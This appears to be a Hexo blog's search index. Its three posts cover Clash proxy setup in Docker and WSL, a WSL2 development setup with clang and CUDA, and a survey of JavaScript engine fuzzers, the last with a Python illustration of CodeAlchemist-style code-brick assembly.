local-search.xml
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>Command-line Clash configuration</title>
<link href="/2023/03/29/%E5%91%BD%E4%BB%A4%E8%A1%8CClash%E9%85%8D%E7%BD%AE/"/>
<url>/2023/03/29/%E5%91%BD%E4%BB%A4%E8%A1%8CClash%E9%85%8D%E7%BD%AE/</url>
<content type="html"><![CDATA[<h1 id="服务器clash配置"><a href="#服务器clash配置" class="headerlink" title="服务器clash配置"></a>Clash configuration on a server</h1><h2 id="docker配置"><a href="#docker配置" class="headerlink" title="docker配置"></a>Docker configuration</h2><figure class="highlight routeros"><table><tr><td class="code"><pre><code class="hljs routeros">docker pull dreamacro/clash<br>docker pull haishanh/yacd<br>docker run -d --name=clash -v "$PWD/config.yaml:/root/.config/clash/config.yaml" -p "7890:7890" -p "9090:9090" --restart=unless-stopped dreamacro/clash<br>docker run -p 1234:80 -d --name clash-dashboard haishanh/yacd<br></code></pre></td></tr></table></figure><p>The configuration file used when the container is created stays at the specified host path, so to update it you only need to edit that file outside the container and restart the container.</p><p>yacd is a web-based Clash dashboard that makes it convenient to configure the Clash instance on the server remotely.</p><h2 id="clash配置文件"><a href="#clash配置文件" class="headerlink" title="clash配置文件"></a>Clash configuration file</h2><p>Set the <code>allow-lan</code> parameter to true</p><h2 id="docker-clash操作"><a href="#docker-clash操作" class="headerlink" title="docker clash操作"></a>Docker Clash operations</h2><figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash"># start<br>sudo docker start clash<br>sudo docker start clash-dashboard<br><br># stop<br>sudo docker stop clash-dashboard<br>sudo docker stop clash<br><br></code></pre></td></tr></table></figure><h2 id="控制面版"><a href="#控制面版" class="headerlink" title="控制面版"></a>Control panel</h2><figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk">http://ip:1234/<br></code></pre></td></tr></table></figure><p>The URL entered in the panel; note that it must not end with a <code>/</code></p><figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk">http://ip:9090<br></code></pre></td></tr></table></figure><p>Test</p><figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk">curl -x http://127.0.0.1:7890 https://www.google.com.hk/<br></code></pre></td></tr></table></figure><h2 id="全局代理"><a href="#全局代理" class="headerlink" title="全局代理"></a>Global proxy</h2><figure class="highlight verilog"><table><tr><td class="code"><pre><code class="hljs verilog">export http_proxy='http://127.0.0.1:7890'<br>export https_proxy='http://127.0.0.1:7890'<br># git proxy settings (the proxy on port 7890 speaks plain HTTP, so both entries use the http:// scheme)<br>git config --global http.proxy http://127.0.0.1:7890<br>git config --global https.proxy http://127.0.0.1:7890<br># npm proxy settings<br>npm config set proxy http://127.0.0.1:7890<br>npm config set https-proxy http://127.0.0.1:7890<br><br># remove the proxy settings<br>unset http_proxy<br>unset https_proxy<br>git config --global --unset http.proxy<br>git config --global --unset https.proxy<br></code></pre></td></tr></table></figure><h2 id="docker命令"><a href="#docker命令" class="headerlink" title="docker命令"></a>Docker commands</h2><figure class="highlight jboss-cli"><table><tr><td class="code"><pre><code class="hljs jboss-cli">docker ps [OPTIONS]<br># OPTIONS:<br># -a: show all containers, including ones that are not running<br># -f: filter the output by condition<br># -l: show the most recently created container<br># -n: list the n most recently created containers<br># -q: quiet mode, show only container IDs<br># -s: show total file sizes<br># --no-trunc: do not truncate output, show full container details<br><br># start, stop, restart:<br>docker start CONTAINER [CONTAINER...]<br>docker stop CONTAINER [CONTAINER...]<br>docker restart CONTAINER [CONTAINER...]<br></code></pre></td></tr></table></figure><h1 id="depot-tools"><a href="#depot-tools" class="headerlink" title="depot_tools"></a>depot_tools</h1><h2 id="使用代理"><a href="#使用代理" class="headerlink" title="使用代理"></a>Using a proxy</h2><p>Create the configuration file /etc/gclient.boto. This file is what makes depot_tools use the proxy settings we configured, and its path must be exported in the environment.</p><figure class="highlight ini"><table><tr><td class="code"><pre><code class="hljs ini">[Boto]<br>proxy = 127.0.0.1<br>proxy_port = 7890<br></code></pre></td></tr></table></figure><p>Configure the environment variables</p><figure class="highlight routeros"><table><tr><td class="code"><pre><code class="hljs routeros">export http_proxy='http://127.0.0.1:7890'<br>export https_proxy='http://127.0.0.1:7890'<br>export NO_AUTH_BOTO_CONFIG=/etc/gclient.boto<br></code></pre></td></tr></table></figure><h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>Installation</h2><p>Install depot_tools and add it to the PATH environment variable</p><figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk">git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git<br>export PATH=$PATH:[path to the depot_tools directory]<br></code></pre></td></tr></table></figure><p>Run the gclient command to confirm that everything works; this command goes online to check for updates to the current depot_tools.</p><figure class="highlight ebnf"><table><tr><td class="code"><pre><code class="hljs ebnf">gclient<br></code></pre></td></tr></table></figure><h1 id="wsl中使用的快速配置"><a href="#wsl中使用的快速配置" class="headerlink" title="wsl中使用的快速配置"></a>Quick setup for use in WSL</h1><p>Save the file ~/.proxyrc</p><figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">#!/bin/bash<br># the Windows host is reachable at the nameserver address WSL writes into resolv.conf<br>host_ip=$(cat /etc/resolv.conf |grep "nameserver" |cut -f 2 -d " ")<br>export ALL_PROXY="http://$host_ip:7890"<br>export http_proxy="http://$host_ip:7890"<br>export https_proxy="http://$host_ip:7890"<br>git config --global http.proxy http://$host_ip:7890<br>git config --global https.proxy http://$host_ip:7890<br>export NO_AUTH_BOTO_CONFIG=/etc/gclient.boto<br></code></pre></td></tr></table></figure><p>Run <code>source ~/.proxyrc</code> to configure the proxy</p>]]></content>
<tags>
<tag>Tool</tag>
</tags>
</entry>
<entry>
<title>Quick WSL2 deployment</title>
<link href="/2023/02/19/WSL2%E5%BF%AB%E9%80%9F%E9%83%A8%E7%BD%B2/"/>
<url>/2023/02/19/WSL2%E5%BF%AB%E9%80%9F%E9%83%A8%E7%BD%B2/</url>
<content type="html"><![CDATA[<h1 id="下载系统"><a href="#下载系统" class="headerlink" title="下载系统"></a>Downloading a distribution</h1><figure class="highlight dsconfig"><table><tr><td class="code"><pre><code class="hljs dsconfig">wsl --list --online  # list distributions available for download<br>wsl --install -d (system)  # install the specified distribution<br>wsl -d (name)  # start a distribution<br>wsl -t (name)  # terminate a distribution<br>wsl --export Ubuntu-20.04 D:\Ubuntu20.tar  # export an image<br>wsl --unregister Ubuntu-20.04  # delete a distribution<br></code></pre></td></tr></table></figure><p>If the download is slow, use a proxy</p><figure class="highlight routeros"><table><tr><td class="code"><pre><code class="hljs routeros">set http_proxy=http://127.0.0.1:7890<br>set https_proxy=http://127.0.0.1:7890<br></code></pre></td></tr></table></figure><p>If that still does not work, download Ubuntu directly from the Microsoft Store</p><h1 id="配置系统"><a href="#配置系统" class="headerlink" title="配置系统"></a>Configuring the distribution</h1><p>Install the distribution at the desired location</p><figure class="highlight gcode"><table><tr><td class="code"><pre><code class="hljs gcode">wsl --import Ubuntu20 E:\Systems\Ubuntu20 D:\Systems\Ubuntu20.tar<br>wsl -d Ubuntu20<br></code></pre></td></tr></table></figure><p>Configure the login user in /etc/wsl.conf</p><figure class="highlight ini"><table><tr><td class="code"><pre><code class="hljs ini">[user]<br>default=azyka<br></code></pre></td></tr></table></figure><p>Restart the distribution</p><figure class="highlight gcode"><table><tr><td class="code"><pre><code class="hljs gcode">wsl -t Ubuntu20<br>wsl -d Ubuntu20<br></code></pre></td></tr></table></figure><p>Switch the apt sources</p><figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk">sudo mv /etc/apt/sources.list /etc/apt/sources.list.bak<br>sudo vi /etc/apt/sources.list<br></code></pre></td></tr></table></figure><p>Aliyun mirror</p><figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk">deb https://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse<br>deb-src https://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse<br><br>deb https://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse<br>deb-src https://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse<br><br>deb https://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse<br>deb-src https://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse<br><br># deb https://mirrors.aliyun.com/ubuntu/ focal-proposed main restricted universe multiverse<br># deb-src https://mirrors.aliyun.com/ubuntu/ focal-proposed main restricted universe multiverse<br><br>deb https://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse<br>deb-src https://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse<br></code></pre></td></tr></table></figure><p>Update the package lists</p><figure class="highlight ebnf"><table><tr><td class="code"><pre><code class="hljs ebnf">sudo apt update<br>sudo apt upgrade<br></code></pre></td></tr></table></figure><h1 id="获取Clang"><a href="#获取Clang" class="headerlink" title="获取Clang"></a>Getting Clang</h1><p>Import the repository signing key</p><figure class="highlight sas"><table><tr><td class="code"><pre><code class="hljs sas">wget -O - https://apt.llvm.org/llvm-snapshot.gpg.key | sudo apt-key add -<br></code></pre></td></tr></table></figure><p>Add the repository <a href="https://apt.llvm.org/">https://apt.llvm.org/</a></p><figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk">deb http://apt.llvm.org/focal/ llvm-toolchain-focal main<br>deb-src http://apt.llvm.org/focal/ llvm-toolchain-focal main<br># 14<br>deb http://apt.llvm.org/focal/ llvm-toolchain-focal-14 main<br>deb-src http://apt.llvm.org/focal/ llvm-toolchain-focal-14 main<br># 15<br>deb http://apt.llvm.org/focal/ llvm-toolchain-focal-15 main<br>deb-src http://apt.llvm.org/focal/ llvm-toolchain-focal-15 main<br></code></pre></td></tr></table></figure><p>Update the package lists (requires a proxy)</p><figure class="highlight ebnf"><table><tr><td class="code"><pre><code class="hljs ebnf">sudo apt update<br></code></pre></td></tr></table></figure><p>Install clang-14</p><figure class="highlight apache"><table><tr><td class="code"><pre><code class="hljs apache">apt-get install clang-14 lldb-14 lld-14<br></code></pre></td></tr></table></figure><p>Version switching that may be needed</p><figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk">sudo update-alternatives --install /usr/bin/clang clang /usr/bin/clang-14 1 --slave /usr/bin/clang++ clang++ /usr/bin/clang++-14<br><br>sudo update-alternatives --install /usr/bin/llvm-config llvm-config /usr/bin/llvm-config-14 1<br></code></pre></td></tr></table></figure><h1 id="安装Anaconda"><a href="#安装Anaconda" class="headerlink" title="安装Anaconda"></a>Installing Anaconda</h1><p><a href="https://linuxize.com/post/how-to-install-anaconda-on-ubuntu-20-04/">https://linuxize.com/post/how-to-install-anaconda-on-ubuntu-20-04/</a></p><h1 id="CUDA-in-WSL2"><a href="#CUDA-in-WSL2" class="headerlink" title="CUDA in WSL2"></a>CUDA in WSL2</h1><figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk">sudo apt-key del 7fa2af80<br>wget https://developer.download.nvidia.com/compute/cuda/repos/wsl-ubuntu/x86_64/cuda-wsl-ubuntu.pin<br>sudo mv cuda-wsl-ubuntu.pin /etc/apt/preferences.d/cuda-repository-pin-600<br>wget https://developer.download.nvidia.com/compute/cuda/12.0.0/local_installers/cuda-repo-wsl-ubuntu-12-0-local_12.0.0-1_amd64.deb<br>sudo dpkg -i cuda-repo-wsl-ubuntu-12-0-local_12.0.0-1_amd64.deb<br>sudo cp /var/cuda-repo-wsl-ubuntu-12-0-local/cuda-*-keyring.gpg /usr/share/keyrings/<br>sudo apt-get update<br>sudo apt-get -y install cuda<br></code></pre></td></tr></table></figure>]]></content>
<tags>
<tag>Tool</tag>
</tags>
</entry>
<entry>
<title>A survey of JavaScript engine fuzzing</title>
<link href="/2022/09/30/Javascript%E5%BC%95%E6%93%8E%E6%A8%A1%E7%B3%8A%E6%B5%8B%E8%AF%95%E8%B0%83%E7%A0%94/"/>
<url>/2022/09/30/Javascript%E5%BC%95%E6%93%8E%E6%A8%A1%E7%B3%8A%E6%B5%8B%E8%AF%95%E8%B0%83%E7%A0%94/</url>
<content type="html"><![CDATA[<h1 id="JS引擎常识"><a href="#JS引擎常识" class="headerlink" title="JS引擎常识"></a>JS引擎常识</h1><h2 id="基本结构"><a href="#基本结构" class="headerlink" title="基本结构"></a>基本结构</h2><ul><li>parser解析器:将源码转为AST</li><li>interpreter:将AST转为字节码</li><li>JIT编译器:优化字节码</li><li>运行环境:支持interpreter运行</li></ul><p>其中parser和interpreter逻辑简单,近期少有在其中发现bug的报告</p><p>JIT又根据js引擎、下层IR、优化技术等不同有不同的实现方式</p><h2 id="编译流程"><a href="#编译流程" class="headerlink" title="编译流程"></a>编译流程</h2><p>通常情况下,JS引擎处理输入文件分为以下2阶段:</p><ol><li>code validity check<ul><li>syntax analysis语法分析——解析得到AST</li><li>semantic analysis语义分析</li></ul></li><li>code interpreting execution<ul><li>pre-parsing预解析</li><li>运行(未被优化的字节码会在代码被编译前运行,以求保证实际处理效率)</li></ul></li></ol><h2 id="漏洞类型"><a href="#漏洞类型" class="headerlink" title="漏洞类型"></a>漏洞类型</h2><p>JS引擎中包含的漏洞类型:</p><ul><li>overflow</li><li>UAF</li><li>race condition</li><li>type confusion</li></ul><h2 id="challenge"><a href="#challenge" class="headerlink" title="challenge"></a>challenge</h2><ol><li><p>Test-Case Validity Check</p><p>代码错误会终止整个代码的运行,将时间消耗在parsing阶段且没有实际运行,降低了fuzz效率</p></li><li><p>Code Coverage Enhancement</p><p>衡量fuzzing工具的重要标准</p><p>由于js引擎的代码量极大,测试用例往往只会覆盖到有限的执行路径,如何提高代码覆盖率是一个重要的挑战。</p></li></ol><h1 id="JS-fuzz方法"><a href="#JS-fuzz方法" class="headerlink" title="JS fuzz方法"></a>JS fuzz方法</h1><h2 id="生成式"><a href="#生成式" class="headerlink" title="生成式"></a>生成式</h2><p>问题——如何自动生成具有丰富代码样式的测试用例且遵循JS语法</p><p>fuzzer</p><ul><li><p>Peach</p><p>需要手动构建测试用例样本,生成样本的错误率高</p></li><li><p>JSfunfuzz——引入grammar-based</p><p>可以自动生成随机且语法正确的测试用例</p><p>需要花费大量时间构建语法规则样本</p></li><li><p>TreeFuzz、Skyfire</p><p>引入概率模型,从现有样本提取语法特征和规则来生成测试用例</p><p>使用data-driven test case generation</p></li><li><p>CodeAlchemist——引入semantics-aware</p><p>首次使用AST实现初始种子片段化,经过去重、变量归一化等预处理措施后,根据控制流和数据流分析获取变量定义,然后结合代码插桩识别变量类型。最后,组装匹配约束的代码片段以生成语义正确的 JS 测试用例</p></li><li><p>Montage ——引入神经网络语言模型</p><p>使用fragment概念作为基本单元</p><p>fragment:将AST转为多个深度为1的子树,每个内部节点都会产生一个单元子树,称这样的子树为fragment</p><p>数据集:<a 
href="https://github.com/tc39/test262">https://github.com/tc39/test262</a></p><p>NEUZZ 同样是深度学习fuzzer</p></li><li><p>Comfort——使用advanced Transformer-based GPT-2模型替代NNLM</p></li></ul><h2 id="变异式"><a href="#变异式" class="headerlink" title="变异式"></a>变异式</h2><p>js严格的输入检查使基于字节进行随机变异的fuzzer效果很差,因此变异式fuzzing需要关注js语法结构和变异程度</p><ul><li><p>Superion——灰盒</p><p>在js AST层面基于AFL和ANTLR变异</p><p>使用语法感知的修检策略直接在AST层面减少测试输入</p><p>使用子树替代实现种子变异</p></li><li><p>Deity</p><p>从1-day exp样本提取特征模板,使用分析工具Esprima实现AST层面的修建和变异操作</p></li><li><p>SaFuzzer</p><p>结合语义修复机制来解决句法有效但语义无效的问题,同样在AST层面</p></li><li><p>Fuzzilli</p><p>引入自定义的IR——FuzzIL,与实际js引擎执行的字节码更接近,IR层面变异后转化为JS代码,这种方式有效继承了初始输入的控制流和数据流属性,保持了测试用例的语义合法性。但Fuzzilli忽略了路径覆盖率信息。</p></li></ul><h2 id="混合式"><a href="#混合式" class="headerlink" title="混合式"></a>混合式</h2><p>生成式因输入空间大而导致效率较低,变异式难以保证测试用例语义正确性,混合式通过结合这两种方式平衡合法性和效率问题</p><ul><li><p>LangFuzz——最早的混合式</p><p>引入code-fragmentation,将合法JS代码解析成AST,从中提取代码片段并存储到片段池,通过片段替换生成新测试用例</p><p>生成:广度优先策略替换非终端AST节点</p><p>变异:随机替换同级节点</p></li><li><p>GramFuzz </p><p>生成:使用深度优先策略</p><p>变异:使用删除、修改、复制等多种变异操作</p></li><li><p>IFuzzer </p><p>遗传算法选择、交叉、变异JS样本,增加测试用例生成模式</p><p><strong>上面3个fuzzer都是context-free grammar,代码块的变异都属于AST层面,且都是没有使用反馈机制的黑盒模型</strong></p></li><li><p>Nautilus ——灰盒</p><p>增加插桩和覆盖率反馈,方法和AFL相似</p><p>生成和变异都基于AST,根据反馈信息从5中变异方式中选择合适的变异方法。</p></li><li><p>DIE ——2021年为止最佳fuzzer</p><p>Aspect-Preserving 变异,保持特殊结构和类型信息,避免了代码块可能导致的逻辑结构和原始语义破坏问题。基于高质量JS样本生成初始语料库,使用结构和类型保持的编译算法生成新测试用例。</p><p>定义了Aspect的概念,即很可能触发问题的元素,尽可能地保持影响控制流和数据依赖的重要代码结构。</p><p>大大提升了测试用例地合法性和定位深层bug(JIT优化过程中的缺陷)能力</p><p>利用反馈机制有效缩减了样本空间,减少无效变异</p></li></ul><h1 id="fuzzing框架"><a href="#fuzzing框架" class="headerlink" title="fuzzing框架"></a>fuzzing框架</h1><h2 id="初始语料库构建"><a href="#初始语料库构建" class="headerlink" title="初始语料库构建"></a>初始语料库构建</h2><ul><li>手写</li><li>爬虫</li><li>POC和test suites</li><li>官方测试数据集</li></ul><p>主流——将测试用例转为AST</p><p>DIE——将测试用例转为Typed-AST</p><p>Montage——深度学习官方ECMA test suites</p><h2 id="Effectiveness-amp-Efficiency-平衡"><a 
href="#Effectiveness-amp-Efficiency-平衡" class="headerlink" title="Balancing effectiveness and efficiency"></a>Balancing effectiveness and efficiency</h2><p>Generation-based fuzzers focus on the validity of the test cases they produce.</p><p>Mutation-based fuzzers focus on efficiency.</p><h2 id="运行时反馈"><a href="#运行时反馈" class="headerlink" title="Runtime feedback"></a>Runtime feedback</h2><p>Open-source targets</p><ul><li>Compile-time instrumentation</li></ul><p>Closed-source targets</p><ul><li>AFL-qemu (QEMU mode)</li><li>Dynamic binary instrumentation</li><li>Intel PT (processor trace)</li></ul><h1 id="发展"><a href="#发展" class="headerlink" title="Trends"></a>Trends</h1><p>Open problems</p><ul><li><p>How to locate JS engine bugs quickly and precisely, and patch them according to their threat level</p></li><li><p>How to construct and run high-quality test cases</p><ul><li><p>Mainstream approach: generate and mutate at the AST level according to predefined models and strategies</p><p>Limitations:</p><ul><li>Deep bugs are hard to find. JS engine vulnerabilities have moved from simple parsing and memory bugs to deep logic bugs in the optimising tiers, whose trigger conditions are stricter, so test cases must be valid and must reach deep execution paths.</li><li>The huge code base implies a huge fuzzing search space, which raises the bar for the fuzzer's execution mechanism and for the hardware budget.</li></ul></li></ul></li></ul><p>New directions</p><ul><li>Combining fuzzing with deep learning (see NEUZZ)</li><li>Fuzzing the JIT compiler directly (an early exploration: JITFuzz)</li><li>Deploying high-performance machines to raise execution capacity</li></ul><h2 id="2022最新论文"><a href="#2022最新论文" class="headerlink" title="Recent papers (2022)"></a>Recent papers (2022)</h2><ul><li><p>JIT-Picking: Differential Fuzzing of JavaScript Engines</p></li><li><p>KOP-Fuzzer: A Key-Operation-based Fuzzer for Type Confusion Bugs in JavaScript Engines</p></li></ul><h1 id="CodeAlchemist"><a href="#CodeAlchemist" class="headerlink" title="CodeAlchemist"></a>CodeAlchemist</h1><ul><li><p>Semantics-aware assembly</p><p>JS seeds are split into a set of composable building blocks derived from the AST, called code bricks. A code brick is itself a valid JS AST, so it can be evaluated by a JS engine on its own. For example, a single JS statement can become a code brick, and so can a statement block (BlockStatement).</p><p>When code bricks are connected, the connection is governed by an assembly constraint consisting of a precondition and a postcondition. The precondition is the set of variable symbols, with their types, that must already be defined for the brick to execute without a runtime error. The postcondition describes which variables of which types are available afterwards, i.e. which variables are defined by the end of the brick.</p></li></ul><h2 id="设计"><a href="#设计" class="headerlink" title="Design"></a>Design</h2><ul><li><p>Seed fragmentization</p><p>The AST is traversed recursively and one code brick is extracted at each step.</p></li><li><p>Code brick pool</p><p>Bricks are deduplicated after variable renaming.</p></li><li><p>Data-flow analysis</p><p>Determines which variables are defined at the end of each code brick and maintains use-def chains.</p><p>The analysis is not path-sensitive: differences between the branches of an if statement are ignored.</p></li><li><p>Code brick assembly</p><p>Starts with 4 parameters; each iteration appends one code brick, which may be either a single JS statement or a block extracted in the first step, with the two probabilities summing to 1.</p></li></ul><h1 id="Montage"><a href="#Montage" class="headerlink" title="Montage"></a>Montage</h1><p>Neural network language model</p><h2 id="设计-1"><a href="#设计-1" class="headerlink" title="Design"></a>Design</h2><ul><li><p>Fragments</p><p>The fragment is the basic unit: the AST is converted into subtrees of depth 1, one for each internal node, and each such unit subtree is called a fragment.</p></li><li><p>Training the LSTM model</p><p>Pruning: fragments whose frequency falls below a threshold are treated as out-of-vocabulary (OoV).</p><p>A language model is built that predicts the next fragment from the context (all preceding fragments).</p></li><li><p>Generating JS files</p><p>Take the seed AST that the LSTM model randomly generates and repair the reference errors in it.</p></li></ul><h1 id="Fuzzilli"><a href="#Fuzzilli" class="headerlink" title="Fuzzilli"></a>Fuzzilli</h1><p>Introduces a custom IR, FuzzIL, which is closer to the bytecode the JS engine actually executes. Mutation happens at the IR level and the result is then lifted to JS code. This preserves the control-flow and data-flow properties of the original input and keeps the test cases semantically valid.</p><h2 id="问题"><a href="#问题" class="headerlink" title="Problem"></a>Problem</h2><ul><li>The space of programs expressible in the IR is not the same as the space of real JS programs.</li></ul><h1 id="Sofi"><a href="#Sofi" class="headerlink" title="SoFi"></a>SoFi</h1><h2 id="设计-2"><a href="#设计-2" class="headerlink" title="Design"></a>Design</h2><ul><li><p>Reflection-based analysis to identify an object's invisible properties and methods</p><p>Reflection functions such as Object.getOwnPropertyNames are used to analyse the objects in the current seed dynamically and to record the methods and properties available on them.</p></li><li><p>Semantics-aware mutation strategy</p><p>The mutation operators are element mutation and element insertion only; nothing is deleted.</p><p>Mutation</p><ul><li>Numeric mutation</li><li>Expression mutation</li></ul><p>Insertion</p><ul><li>Insert member operations discovered by reflection</li><li>Insert declarations taken from other input samples, filtered conservatively so that the inserted content disturbs the original semantics as little as possible</li><li>Insert calls to functions defined in the current sample</li></ul></li><li><p>Automatic repair (fixing broken semantics during dynamic execution)</p><p>A heuristic approach: invalid mutations were surveyed, the common errors were summarised, and repairs are rule-based. Repair locates the error position and the element that caused it; if the error cannot be repaired, the element is removed. Handled error classes:</p><ul><li>ReferenceError</li><li>TypeError</li><li>RangeError</li><li>URIError</li></ul></li></ul><h1 id="DIE"><a href="#DIE" class="headerlink" title="DIE"></a>DIE</h1><p>Defines the notion of an aspect: an element that is likely to trigger a bug. The important code structures that affect control flow and data dependencies are preserved as far as possible.</p><p>Greatly improves test-case validity and the ability to reach deep bugs (defects in JIT optimisation).</p><p>Uses feedback to shrink the sample space and reduce invalid mutations.</p><h2 id="设计-3"><a href="#设计-3" class="headerlink" title="Design"></a>Design</h2><p>Aspect-preserving mutation keeps special structures and type information, avoiding the broken logic and semantics that replacing whole code blocks can cause. An initial corpus is generated from high-quality JS samples, and new test cases are produced by a structure- and type-preserving algorithm.</p><p>Aspect-preserving mutation has two strategies:</p><ul><li>Structure preservation: keep structural aspects such as loops and behaviours</li><li>Type preservation: keep the type of every syntactic element</li></ul><p>Mutation operates on a typed AST, which carries the structure of the input sample together with type information for every node. The operations are:</p><ul><li>Mutating a typed sub-AST</li><li>Inserting a statement</li><li>Introducing a new variable</li></ul><p>The JS type system does not fix the type of a variable, and a variable's type may change at runtime, so the paper proposes a new type classification:</p><ul><li>Mixed type: a type that changes at runtime; it describes every type a syntactic unit may take</li><li>Detailed compound types: the types of sub-elements are inspected for a finer classification<ul><li>Array: classified by its elements; an array holding elements of several kinds, or empty slots, is treated as Any Array</li><li>Object: the object's property keys and values are stored</li><li>Function: parameter and return types are considered</li></ul></li></ul><p>With these more precise types, DIE replaces code blocks more accurately and produces fewer invalid programs.</p><h1 id="JIT-Picking"><a href="#JIT-Picking" class="headerlink" title="JIT-Picking"></a>JIT-Picking</h1><ul><li><p>Built on top of Fuzzilli</p></li><li><p>Introduces differential testing to find JIT bugs that do not cause a crash</p></li></ul><h2 id="JS引擎差异测试"><a href="#JS引擎差异测试" class="headerlink" title="Differential testing of JS engines"></a>Differential testing of JS engines</h2><p>A JS engine contains two implementations that execute JS code with the same semantics: an interpreter that evaluates statements one by one, and a JIT compiler that emits aggressively optimised native machine code. Depending on the engine, one or more intermediate JIT tiers sit between the interpreter and the optimising compiler; they offer a middle ground between the interpreter's low start-up cost and the efficient code execution of the fully optimising JIT.</p>]]></content>
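<![CDATA[<p>The semantics-aware assembly described above for CodeAlchemist, as an added example in Python that is not CodeAlchemist's own code: a constructed JS seed is fragmentized into one brick per statement, each brick gets an assembly constraint (precondition: its free variables with a required type tag; postcondition: the variables it defines with their type), and new programs are assembled by binding every precondition to a context variable of compatible type and renaming definitions to fresh names, so the result never references an undefined variable. The JS subset (statements without inner semicolons), the BUILTINS and KEYWORDS lists and the static type tags are assumptions of this toy; CodeAlchemist obtains types by actually executing the seed.</p>

```python
"""Semantics-aware assembly of JS code bricks (illustration, not CodeAlchemist's code).

A tiny JS subset is parsed with regular expressions: one statement per brick,
declarations of the form `var x = <init>;` and plain expression statements.
Types are tagged statically from the initializer (an assumption of this toy;
CodeAlchemist infers them by running the seed).
"""
import random
import re
from dataclasses import dataclass

# Names treated as always defined (assumed list for this toy).
BUILTINS = {"Array", "Math", "Object", "JSON", "Number", "String", "console", "undefined", "NaN"}
KEYWORDS = {"var", "let", "const", "function", "return", "new", "if", "else", "for",
            "while", "true", "false", "null", "typeof", "in", "of", "this"}
DECL_RE = re.compile(r"\b(?:var|let|const)\s+([A-Za-z_$][\w$]*)\s*=\s*([^;]*);")
PARAMS_RE = re.compile(r"function\s*\(([^)]*)\)")
# An identifier that is not a property name (no '.' directly before it).
IDENT_RE = re.compile(r"(?<![.\w$])([A-Za-z_$][\w$]*)")

# Constructed seed; written so that no statement contains an inner ';'.
SEED = """
var arr = [1, 2, 3];
var n = 10;
var obj = new Object();
var f = function(x){ return x * 2 };
arr.push(n);
obj.key = f(n);
var total = arr.reduce(function(a, b){ return a + b }, 0);
n = arr[total % arr.length];
"""


def infer_type(init: str) -> str:
    """Crude static type tag for an initializer expression."""
    init = init.strip()
    if init.startswith("["):
        return "array"
    if init.startswith("function") or "=>" in init:
        return "function"
    if re.fullmatch(r"-?\d+(\.\d+)?", init):
        return "number"
    if init.startswith(("'", '"')):
        return "string"
    m = re.match(r"new\s+([A-Za-z_$][\w$]*)", init)
    return m.group(1) if m else "any"


@dataclass(frozen=True)
class CodeBrick:
    code: str
    pre: tuple   # ((name, required type), ...): must hold before the brick runs
    post: tuple  # ((name, type), ...): defined once the brick has run


def fragmentize(seed: str) -> list:
    """Split a seed into one brick per statement and compute its assembly constraint."""
    bricks = []
    for stmt in (s.strip() + ";" for s in seed.split(";") if s.strip()):
        defs = {name: infer_type(init) for name, init in DECL_RE.findall(stmt)}
        local = set(defs)
        for plist in PARAMS_RE.findall(stmt):  # function parameters are local too
            local.update(p.strip() for p in plist.split(",") if p.strip())
        pre = {}
        for m in IDENT_RE.finditer(stmt):
            name = m.group(1)
            if name in local or name in KEYWORDS or name in BUILTINS:
                continue
            nxt = stmt[m.end():m.end() + 1]
            tag = "function" if nxt == "(" else "array" if nxt == "[" else "any"
            if pre.get(name, "any") == "any":  # keep the most specific requirement seen
                pre[name] = tag
        bricks.append(CodeBrick(stmt, tuple(sorted(pre.items())), tuple(sorted(defs.items()))))
    return bricks


def rename(code: str, mapping: dict) -> str:
    """Rename free identifiers (never property names) according to mapping."""
    return IDENT_RE.sub(lambda m: mapping.get(m.group(1), m.group(1)), code)


def bind(env: dict, pre: tuple, rng: random.Random):
    """For each precondition variable pick a context variable of a compatible type."""
    mapping = {}
    for name, req in pre:
        choices = [v for v, t in env.items() if req == "any" or t == req]
        if not choices:
            return None  # precondition cannot be satisfied by the current context
        mapping[name] = rng.choice(choices)
    return mapping


def assemble(pool: list, n_bricks: int, rng: random.Random) -> str:
    """Chain bricks whose preconditions the context satisfies; definitions get fresh names."""
    env, out, fresh = {}, [], 0
    for _ in range(n_bricks):
        order = list(pool)
        rng.shuffle(order)
        for brick in order:
            mapping = bind(env, brick.pre, rng)
            if mapping is None:
                continue
            for name, _ in brick.post:
                mapping[name] = f"v{fresh}"
                fresh += 1
            out.append(rename(brick.code, mapping))
            for name, typ in brick.post:  # postcondition extends the context
                env[mapping[name]] = typ
            break
    return "\n".join(out)


def defined_before_use(program: str) -> bool:
    """Check the assembly invariant: every free variable of a statement was defined earlier."""
    env = set()
    for brick in fragmentize(program):
        if any(name not in env for name, _ in brick.pre):
            return False
        env.update(name for name, _ in brick.post)
    return True


def build_program(n_bricks: int = 12, seed: int = 7) -> str:
    """Fragmentize the constructed SEED and assemble a new program deterministically."""
    return assemble(fragmentize(SEED), n_bricks, random.Random(seed))


if __name__ == "__main__":
    program = build_program()
    print(program)
    print("defined-before-use:", defined_before_use(program))
```

<p>The type tags here are deliberately weak: <code>arr.push(n)</code> only demands type "any" for <code>arr</code>, so the assembler may bind a number to it and the generated statement then raises a TypeError at runtime, which is exactly the class of invalid test case that CodeAlchemist's dynamically inferred types (and SoFi's runtime repair) are designed to avoid.</p>]]>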
<tags>
<tag>Fuzz</tag>
<tag>JS Engine</tag>
</tags>
</entry>
<entry>
<title>Freedom复现笔记</title>
